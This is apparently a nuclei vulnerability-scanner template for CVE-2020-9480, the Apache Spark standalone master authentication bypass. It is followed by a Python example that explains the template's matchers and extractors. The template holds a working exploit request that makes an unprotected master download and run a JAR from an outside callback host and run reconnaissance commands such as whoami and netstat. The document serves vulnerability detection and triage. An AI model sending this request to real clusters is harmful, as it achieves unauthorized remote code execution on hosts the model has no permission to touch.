id: CVE-2020-9480

info:
  name: Apache Spark - Authentication Bypass
  author: riteshs4hu
  severity: critical
  description: |
    In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc.).
  impact: |
    Attackers can execute arbitrary shell commands on the host machine, leading to full system compromise.
  remediation: |
    Update to Spark 2.4.6 or later to fix the vulnerability.
  reference:
    - https://github.com/XiaoShaYu617/CVE-2020-9480/blob/main/20220624_apache_spark_apache_spark_pre-auth_code_execution_cve-2020-9480.py
    - https://nvd.nist.gov/vuln/detail/cve-2020-9480
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9480
    epss-score: 0.29157
    epss-percentile: 0.97933
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: spark
    fofa-query: port="6066" && banner="Spark Master"
  tags: cve,cve2020,apache,spark,auth-bypass,vkev,vuln

variables:
  url: "http://{{interactsh-url}}/{{rand_text_alpha(5)}}.jar"

http:
  - raw:
      - |
        POST /v1/submissions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "action": "CreateSubmissionRequest",
          "clientSparkVersion": "2.3.1",
          "appArgs": ["whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"],
          "appResource": "{{url}}",
          "environmentVariables": {"SPARK_ENV_LOADED":"1"},
          "mainClass": "Exploit",
          "sparkProperties": {
            "spark.jars": "{{url}}",
            "spark.driver.supervise": "false",
            "spark.app.name": "Exploit",
            "spark.eventLog.enabled": "true",
            "spark.submit.deployMode": "cluster",
            "spark.master": "spark://{{Hostname}}:6066"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - "contains(interactsh_protocol, 'http')"
          - 'contains(body, "CreateSubmissionResponse")'
          - 'contains_any(body, "submissionId", "driverState")'
        condition: and

    extractors:
      - type: regex
        name: submission-id
        regex:
          - '"submissionId"\s*:\s*"([^"]+)"'
          - '"driverState"\s*:\s*"([^"]+)"'
# digest: 490a00463044022009d4d6281511bdacb62d1a771d94923b987aca9a36925064ca0f6c6c0a4046ad022035e8f6de911325d8b4dc3bee027f63fb454dde6775e246d5a90ee448d73b6d35:922c64590222798bb761d5b6d8e72950
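The matcher and extractor logic of the template above, re-expressed as an added Python example so the decision rule is easy to inspect. This is not part of the nuclei template or the Vulners page; the two sample response bodies are constructed (their field names are modelled on Spark's REST submission responses and are an assumption, not captured output). It shows why the template only reports a host when all four conditions hold: a 200 reply alone is not evidence, the master must also have fetched the JAR named in `appResource` (the interactsh HTTP callback) and answered with a `CreateSubmissionResponse` carrying a `submissionId` or `driverState`.

```python
import json
import re

# Regexes copied from the template's extractor section.
SUBMISSION_ID_RE = re.compile(r'"submissionId"\s*:\s*"([^"]+)"')
DRIVER_STATE_RE = re.compile(r'"driverState"\s*:\s*"([^"]+)"')


def template_matches(status_code, body, interactsh_protocol):
    """Mirror of the template's DSL matcher block (condition: and).

    All four conditions must hold: a 200 reply, an HTTP callback to the
    interactsh host (the master actually fetched the JAR from appResource),
    a CreateSubmissionResponse body, and a submissionId or driverState in it.
    """
    return (
        status_code == 200
        and "http" in interactsh_protocol
        and "CreateSubmissionResponse" in body
        and ("submissionId" in body or "driverState" in body)
    )


def extract_ids(body):
    """Mirror of the template's regex extractor: every submissionId / driverState value."""
    return SUBMISSION_ID_RE.findall(body) + DRIVER_STATE_RE.findall(body)


def evaluate(status_code, body, interactsh_protocol):
    """Return the extracted identifiers when the template would report the host, else None."""
    if not template_matches(status_code, body, interactsh_protocol):
        return None
    return extract_ids(body)


# Constructed sample responses (assumed shapes, not captured from a real master).
ACCEPTED_BODY = json.dumps({
    "action": "CreateSubmissionResponse",
    "message": "Driver successfully submitted as driver-20200101000000-0000",
    "serverSparkVersion": "2.4.5",
    "submissionId": "driver-20200101000000-0000",
    "success": True,
})
REJECTED_BODY = json.dumps({
    "action": "ErrorResponse",
    "message": "Unauthorized",
    "serverSparkVersion": "2.4.6",
})

if __name__ == "__main__":
    # Submission accepted and the JAR was fetched: the host is reported.
    print(evaluate(200, ACCEPTED_BODY, "http"))
    # Same body but no callback ever arrived: not reported.
    print(evaluate(200, ACCEPTED_BODY, ""))
    # Submission rejected: not reported.
    print(evaluate(200, REJECTED_BODY, "http"))
```

When triaging scanner output, the extracted `submissionId` is the value to correlate with the master's own submission log or web UI: a driver id that appears there confirms the unauthenticated submission was actually started, which is what distinguishes this finding from a merely exposed REST port.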